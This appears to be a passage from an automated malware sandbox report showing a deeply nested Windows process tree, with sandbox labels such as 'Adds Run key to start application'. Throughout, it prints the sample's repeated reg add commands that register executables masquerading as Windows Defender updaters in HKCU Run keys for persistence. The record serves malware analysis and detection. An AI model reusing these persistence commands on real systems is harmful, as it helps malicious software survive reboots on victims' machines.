        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\451B.tmp\451C.tmp\451D.bat C:\Windows\system32\java.exe"
        62⤵
        
        PID:3304
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        63⤵
        
        PID:2864
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        63⤵
        
        PID:3456
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        63⤵
        
        PID:3452
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        63⤵
        
        PID:3668
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        63⤵
        
        PID:3464
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        63⤵
        
        PID:3472
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        64⤵
        
        PID:3836
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        63⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3480
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        63⤵
        
        PID:3488
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\48E2.tmp\48E3.tmp\48E4.bat C:\Windows\system32\java.exe"
        64⤵
        Drops file in System32 directory
        
        PID:3596
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        65⤵
        Delays execution with timeout.exe
        
        PID:3840
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        65⤵
        Adds Run key to start application
        
        PID:3864
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        65⤵
        
        PID:3856
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        65⤵
        
        PID:3972
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        65⤵
        
        PID:3960
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        65⤵
        
        PID:3952
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        66⤵
        
        PID:3080
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        65⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3936
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        65⤵
        
        PID:3940
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CE8.tmp\4CE9.tmp\4CEA.bat C:\Windows\system32\java.exe"
        66⤵
        
        PID:3148
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        67⤵
        Delays execution with timeout.exe
        
        PID:3120
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        67⤵
        
        PID:2932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        67⤵
        
        PID:3228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        67⤵
        
        PID:3220
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        67⤵
        
        PID:3212
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        67⤵
        
        PID:3208
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        68⤵
        
        PID:3552
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        67⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3196
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        67⤵
        
        PID:3192
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50DE.tmp\50DF.tmp\50E0.bat C:\Windows\system32\java.exe"
        68⤵
        
        PID:2676
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        69⤵
        
        PID:3616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        69⤵
        
        PID:3396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        69⤵
        Adds Run key to start application
        
        PID:3716
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        69⤵
        
        PID:3724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        69⤵
        
        PID:3732
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        69⤵
        
        PID:2516
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        70⤵
        
        PID:4044
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        69⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        69⤵
        
        PID:900
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\54D4.tmp\54D5.tmp\54D6.bat C:\Windows\system32\java.exe"
        70⤵
        
        PID:3504
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        71⤵
        
        PID:2956
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        71⤵
        Adds Run key to start application
        
        PID:2728
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        71⤵
        
        PID:932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        71⤵
        
        PID:1444
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        71⤵
        
        PID:2308
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        71⤵
        
        PID:4068
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        72⤵
        
        PID:3368
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        71⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3156
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        71⤵
        
        PID:1572
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\58E9.tmp\58EA.tmp\58EB.bat C:\Windows\system32\java.exe"
        72⤵
        
        PID:2296
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        73⤵
        
        PID:3384
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        73⤵
        
        PID:3944
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        73⤵
        
        PID:1504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        73⤵
        
        PID:2580
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        73⤵
        
        PID:2784
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        73⤵
        
        PID:4020
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        74⤵
        
        PID:3988
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        73⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4088
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        73⤵
        
        PID:4004
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C91.tmp\5C92.tmp\5C93.bat C:\Windows\system32\java.exe"
        74⤵
        Drops file in System32 directory
        
        PID:3172
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        75⤵
        Delays execution with timeout.exe
        
        PID:2932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        75⤵
        Adds Run key to start application
        
        PID:3912
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        75⤵
        
        PID:3228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        75⤵
        Adds Run key to start application
        
        PID:3260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        75⤵
        
        PID:3264
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        75⤵
        
        PID:2084
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        76⤵
        
        PID:3688
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        75⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3040
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        75⤵
        
        PID:3824
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6059.tmp\605A.tmp\605B.bat C:\Windows\system32\java.exe"
        76⤵
        
        PID:2864
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        77⤵
        Delays execution with timeout.exe
        
        PID:3212
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        77⤵
        
        PID:2908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        77⤵
        
        PID:3028
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        77⤵
        
        PID:3964
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        77⤵
        
        PID:2868
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        77⤵
        
        PID:3716
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        78⤵
        
        PID:2180
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        77⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3904
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        77⤵
        
        PID:3892
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\649D.tmp\649E.tmp\649F.bat C:\Windows\system32\java.exe"
        78⤵
        Drops file in System32 directory
        
        PID:2576
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        79⤵
        
        PID:1528
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        79⤵
        
        PID:1708
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        79⤵
        Adds Run key to start application
        
        PID:3100
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        79⤵
        
        PID:1196
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        79⤵
        
        PID:3828
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        79⤵
        
        PID:3996
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        80⤵
        
        PID:1536
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        79⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3896
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        79⤵
        
        PID:1780
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6835.tmp\6836.tmp\6847.bat C:\Windows\system32\java.exe"
        80⤵
        
        PID:1232
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        81⤵
        
        PID:3644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        81⤵
        
        PID:2188
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        81⤵
        
        PID:3728
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        81⤵
        
        PID:3700
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        81⤵
        Adds Run key to start application
        
        PID:3696
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        81⤵
        
        PID:3436
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        82⤵
        
        PID:3804
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        81⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3616
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        81⤵
        
        PID:3292
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C3B.tmp\6C3C.tmp\6C3D.bat C:\Windows\system32\java.exe"
        82⤵
        Drops file in System32 directory
        
        PID:3888
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        83⤵
        Delays execution with timeout.exe
        
        PID:4012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        83⤵
        
        PID:3652
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        83⤵
        
        PID:2560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        83⤵
        
        PID:1676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        83⤵
        
        PID:2492
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        83⤵
        
        PID:2972
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        84⤵
        
        PID:2364
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        83⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1624
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        83⤵
        
        PID:2956
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7040.tmp\7041.tmp\7042.bat C:\Windows\system32\java.exe"
        84⤵
        
        PID:4088
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        85⤵
        
        PID:3328
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        85⤵
        
        PID:3144
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        85⤵
        
        PID:2260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        85⤵
        
        PID:3624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        85⤵
        
        PID:3200
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        85⤵
        
        PID:3896
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        86⤵
        
        PID:3708
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        85⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3284
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        85⤵
        
        PID:3244
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7427.tmp\7428.tmp\7429.bat C:\Windows\system32\java.exe"
        86⤵
        
        PID:2720
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        87⤵
        
        PID:1680
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        87⤵
        
        PID:3780
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        87⤵
        
        PID:3616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        87⤵
        
        PID:4064
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        87⤵
        
        PID:3256
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        87⤵
        
        PID:3628
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        88⤵
        
        PID:1936
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        87⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3280
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        87⤵
        
        PID:2296
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\77FD.tmp\780E.tmp\780F.bat C:\Windows\system32\java.exe"
        88⤵
        Drops file in System32 directory
        
        PID:3520
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        89⤵
        
        PID:1932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        89⤵
        Adds Run key to start application
        
        PID:2028
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        89⤵
        
        PID:3088
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        89⤵
        
        PID:3920
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        89⤵
        
        PID:3172
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        89⤵
        
        PID:4004
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        90⤵
        
        PID:1356
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        89⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3328
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        89⤵
        
        PID:3144
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7BC5.tmp\7BC6.tmp\7BC7.bat C:\Windows\system32\java.exe"
        90⤵
        Drops file in System32 directory
        
        PID:3496
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        91⤵
        
        PID:2776
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        91⤵
        Adds Run key to start application
        
        PID:3780
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        91⤵
        
        PID:3616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        91⤵
        
        PID:4064
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        91⤵
        
        PID:3256
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        91⤵
        
        PID:3164
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        92⤵
        
        PID:3380
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        91⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        91⤵
        
        PID:4072
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FE9.tmp\7FFA.tmp\7FFB.bat C:\Windows\system32\java.exe"
        92⤵
        Drops file in System32 directory
        
        PID:3004
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        93⤵
        Delays execution with timeout.exe
        
        PID:4008
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        93⤵
        Adds Run key to start application
        
        PID:3180
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        93⤵
        
        PID:3304
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        93⤵
        
        PID:4080
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        93⤵
        
        PID:2168
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        93⤵
        
        PID:2580
        
